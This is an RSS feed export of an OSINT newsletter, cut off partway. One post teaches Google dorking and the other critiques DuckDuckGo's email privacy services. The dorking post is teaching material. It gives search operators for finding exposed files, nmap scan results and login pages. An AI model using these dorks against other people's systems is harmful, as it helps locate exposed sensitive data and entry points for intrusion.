<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[The OSINTion Tidbit]]></title><description><![CDATA[Open Source Intelligence (OSINT), Geospatial Intelligence (GEOINT), OPSEC/Privacy, Disinformation, and Data Science and the impacts they have on society.]]></description><link>https://tidbit.theosintion.com</link><image><url>https://substackcdn.com/image/fetch/$s_!v8Rt!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F25f3dc9f-fdc6-436f-bba0-ba78284de737_400x400.png</url><title>The OSINTion Tidbit</title><link>https://tidbit.theosintion.com</link></image><generator>Substack</generator><lastBuildDate>Mon, 20 Apr 2026 07:11:19 GMT</lastBuildDate><atom:link href="https://tidbit.theosintion.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[The OSINion]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[theosintion@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[theosintion@substack.com]]></itunes:email><itunes:name><![CDATA[Joe Gray]]></itunes:name></itunes:owner><itunes:author><![CDATA[Joe Gray]]></itunes:author><googleplay:owner><![CDATA[theosintion@substack.com]]></googleplay:owner><googleplay:email><![CDATA[theosintion@substack.com]]></googleplay:email><googleplay:author><![CDATA[Joe Gray]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[OSINT Technique Spotlight: Google Dorking]]></title><description><![CDATA[It's not what you ask, but HOW you ask it]]></description><link>https://tidbit.theosintion.com/p/osint-technique-spotlight-google</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/osint-technique-spotlight-google</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Tue, 08 Nov 2022 13:01:07 GMT</pubDate><enclosure url="https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you&#8217;ve been around OSINT or even Infosec, both red and blue, for a while, you&#8217;ve probably heard of <em><strong>Google Dorking</strong></em> or <em><strong>Google Hacking</strong></em>. There is no difference in the terms, aside from some audiences being more apt to adopt the techniques if the word <em><strong>hacking</strong></em> is omitted. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 424w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 848w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 1272w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 1456w" sizes="100vw"><img src="https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080" width="1080" height="1350" data-attrs="{&quot;src&quot;:&quot;https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1350,&quot;width&quot;:1080,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;photo of M&amp;M forming Google chocolate candies on table&quot;,&quot;title&quot;:&quot;photo of M&amp;M forming Google chocolate candies on table&quot;,&quot;type&quot;:&quot;image/jpg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="photo of M&amp;M forming Google chocolate candies on table" title="photo of M&amp;M forming Google chocolate candies on table" srcset="https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 424w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 848w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 1272w, https://images.unsplash.com/photo-1536009197840-7b923cc3e195?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwzMDAzMzh8MHwxfHNlYXJjaHwyNnx8Z29vZ2xlfGVufDB8fHx8MTY2Nzg3NjEzOQ&amp;ixlib=rb-4.0.3&amp;q=80&amp;w=1080 1456w" sizes="100vw" loading="lazy" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Photo by <a href="https://unsplash.com/@lalonchera">lalo Hernandez</a> on <a href="https://unsplash.com">Unsplash</a></figcaption></figure></div><p>The technique, pioneered by Johnny Long, Bill Gardner, Alrik van Eijkelenborg, Ed Skoudis, and Justin Brown was the subject of three books, the <a href="https://www.amazon.com/Google-Hacking-Penetration-Testers-Johnny/dp/0128029641/">last being published in 2015</a>. It also existed in a web-based database until Johnny turned over control to Exploit-DB when he went on a year-long mission trip. It now exists <a href="https://www.exploit-db.com/google-hacking-database">here</a>. Johnny also presented the topic at <a href="https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf">Black Hat EU 2005</a>.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://tidbit.theosintion.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">The OSINTion Tidbit is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><h2>What exactly is Google Dorking?</h2><p>As the subtitle suggests, it merely consists of 2 things:</p><ol><li><p>Speaking the language of the search engine</p></li><li><p>Asking the question in the most favorable way to the search engine (<em>not <strong>WHAT </strong>you ask, but<strong> HOW </strong>you ask it<strong>)</strong></em></p></li></ol><h3>Speaking the Language</h3><p>Search engines, whether Google, Bing, DuckDuckGo, or Yandex are nothing more than the implementation of an algorithm. The intention of the algorithm is to provide the most relevant and engaging results to the user in the fastest possible time. The motives and monetization structure of the company running the search engine may also affect the algorithm, but it&#8217;s largely the ability to quickly and accurately comb through their index. This is why many search engine companies invest heavily in Data Science, specifically Natural Language Processing (NLP).</p><p>Think of it this way: Speaking English or Arabic to order food in France <em><strong>may</strong></em> work for you. In some parts of Paris, especially. In some of the more remote places, not as much. Taking the time to learn part of the language and at least attempting can pay massive dividends.</p><h3>How to Ask the Questions</h3><p>I typically equate this to asking a toddler what they want for lunch. Simply ask them and you have no boundaries as to what they are going to say. Limit it to a peanut butter sandwich or a tuna sandwich and you&#8217;ll get better results, although still some wild combinations.</p><p>For this, each search engine has its own &#8220;language.&#8221; Using Google&#8217;s language is known as Google Hacking or Google Dorking. Intel0logist has curated a nice StartPage of Search Engine resources, including dorks and syntax for many search engines <a href="https://start.me/p/nRADzL/advanced-search-tools">available here</a>.</p><p>For the purpose of this post, I will share some of my favorite Google dorks and explanations of how to use them.</p><ul><li><p><code>intext:</code> This is my universal favorite. I use it to search for people, Google tracking codes, cryptocurrency addresses, and more!</p></li><li><p><code>ext:</code><strong> or </strong><code>filetype:</code> I like to use this to find files that probably shouldn&#8217;t be on the internet in addition to looking for NMAP scan results (<code>filetype:nmap</code> or <code>filetype:gnmap)</code> and Google Earth KML files (<code>ext:KML</code>).</p></li><li><p><code>inurl: </code>and <code>intitle:</code> I like to use these in enumerating login pages and sensitive directories. </p></li><li><p><code>related:</code> Logic would have this dork enumerating subdomains and other related properties. Nope. It is very useful in enumerating competitors.</p></li><li><p><code>site: </code>Limits the scope of the search to a particular site or domain.</p></li><li><p><code>link:</code> Finds links to a page. Useful in finding fraudulent and cloned pages.</p></li></ul><p>These are amplified through the use of Boolean Logic:</p><ul><li><p><code>AND</code> (<code>+</code>)</p></li><li><p><code>OR</code> (<code>|</code>)</p></li><li><p><code>NOT</code> (<code>-</code>)</p></li><li><p><code>*</code> (wildcard)</p></li><li><p><code>&#8220;&#8220;</code> (precise phrase)</p></li></ul><p>Examples:</p><ul><li><p><code>&#8220;Peanut Butter&#8221; AND Jelly</code></p></li><li><p><code>&#8220;butter&#8221; AND jelly -peanut</code></p></li><li><p><code>(Peanut | Almond) Butter AND jelly</code></p></li><li><p><code>&#8220;Peanut Butter Sandwich&#8221; OR &#8220;Tuna Sandwich&#8221;</code></p></li></ul><h1>Conclusion</h1><p>This is the tip of the iceberg. There are many ways you can go about employing Dorking. Take a look at Exploit-DB&#8217;s <a href="https://www.exploit-db.com/google-hacking-database">GHDB</a> to develop your own ways to chain dorks together to find what you&#8217;re looking for. As with anything related to OSINT and Intelligence, keep in mind that these could change at any time with little to no notice. Focus on developing the techniques before touching any tools. Tools may come and go, often faster than techniques become obsolete. If you want to learn more about search engine intelligence, consider taking <a href="https://www.theosintion.com/courses/alternative-and-advanced-search-engine-intelligence/">The OSINTion&#8217;s Alternative and Advanced Search Engine Intelligence (AASEI) course</a>.</p><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://tidbit.theosintion.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">The OSINTion Tidbit is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[DuckDuckGo's Tracking Disabling and Disposable Email Services]]></title><description><![CDATA[Wolves in Sheep's Clothing?]]></description><link>https://tidbit.theosintion.com/p/duckduckgos-new-email-services</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/duckduckgos-new-email-services</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Thu, 22 Jul 2021 13:45:45 GMT</pubDate><enclosure url="https://cdn.substack.com/image/fetch/h_600,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2dccf62-4ac7-4831-a637-437be4a94e5e_420x300.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WGJe!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WGJe!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 424w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 848w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 1272w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WGJe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png" width="1200" height="947" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:947,&quot;width&quot;:1200,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:98620,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WGJe!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 424w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 848w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 1272w, https://substackcdn.com/image/fetch/$s_!WGJe!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F55e95487-9352-4e03-897d-8ee0d9c1ba6a_1200x947.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>Background</h1><p>As some of you may know, Spread Privacy, the parent company of the DuckDuckGo search engine, <a href="http://www.spreadprivacy.com/introducing-email-protection-beta/">announced</a> on 20 July 2021 two new services. The first is similar to the disposable email addresses akin to <a href="https://mysudo.com/">MySudo</a>, <a href="https://temp-mail.org/">Temp Mail</a>, and others. The other, and a larger threat to privacy, in my opinion, is an &#8220;Email Tracker Removal Service.&#8221;</p><p>Posts about this have been circulating through my various social media feeds this week and as I reviewed the press release and associated documentation with a skeptical lens, it created more questions than answers. This particular post is, in a way, me thinking &#8220;out loud,&#8221; but also asking difficult questions openly to DuckDuckGo regarding the services.</p><h1>Disclaimer</h1><blockquote><p>I am not a lawyer, nor have I played one on Broadway, Saturday Night Live, or any Netflix shows. I am not writing this as legal advice, but rather from the lens of someone concerned with privacy with some background in the IT compliance field, albeit a few years ago. </p><p><strong>While the above disclaimer is mostly a joke, I am definitely not a lawyer!    </strong></p></blockquote><h1>My Thoughts and Analysis</h1><h2>Disposable Email Addresses</h2><p>Seeing as the press release included the domain of <em>duck.com</em>, this service ma<a href="#_msocom_1">[g1]</a>&nbsp;y have a limited shelf life for its intended use. In an era where social media platforms actively prevent people from registering fake accounts (or <em>sock puppets</em>), I suspect that this will have a similar fate. I learned this a few years ago while creating a Facebook account with a <em>MySudo</em> email address. </p><p>There is an incentive for platforms to ensure that users are inputting real information. In some cases, this is from government oversight, such as with US-focused cryptocurrency exchanges and social media platforms. The latter has come under intense scrutiny for their part in disinformation spreading and its possible election influence. Furthermore, such platforms are seeking to sell user data while also realizing that they cannot market such data originating from false accounts.</p><p>DDG&#8217;s <em>duck.com </em>disposable email service seems decent from the technology perspective on the surface, but given my experiences with similar services and products, I doubt that I will use duck.com much, if at all.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3Bet!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3Bet!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 424w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 848w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 1272w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3Bet!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png" width="1175" height="845" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:845,&quot;width&quot;:1175,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:149824,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3Bet!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 424w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 848w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 1272w, https://substackcdn.com/image/fetch/$s_!3Bet!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7da2064f-8991-4200-b864-e2a045f69b18_1175x845.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Screenshot of the announcement on DuckDuckGo&#8217;s parent company&#8217;s site</figcaption></figure></div><h2>Email Tracker Removal Service</h2><blockquote><p>About email trackers: Simply put, email trackers are elements of code quietly included in emails to see if an email is opened or forwarded. Some trackers can ascertain the IP address, hostname, or username of who opens the emails. </p><p>Most often, this is completed with a &#8220;tracking pixel,&#8221; which is a 1x1 pixel (blank image) that phones home to a server when the email is opened. Per <a href="https://www.engadget.com/duckduckgo-email-protection-tracking-pixels-privacy-151024634.html">engadget</a>&#8217;s post about the service, these trackers can be used for targeted ads as well.</p></blockquote><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8Exp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8Exp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 424w, https://substackcdn.com/image/fetch/$s_!8Exp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F87cae8e1-73b1-4d8b-88b6-9672c79511fd_850x340.png 848w, 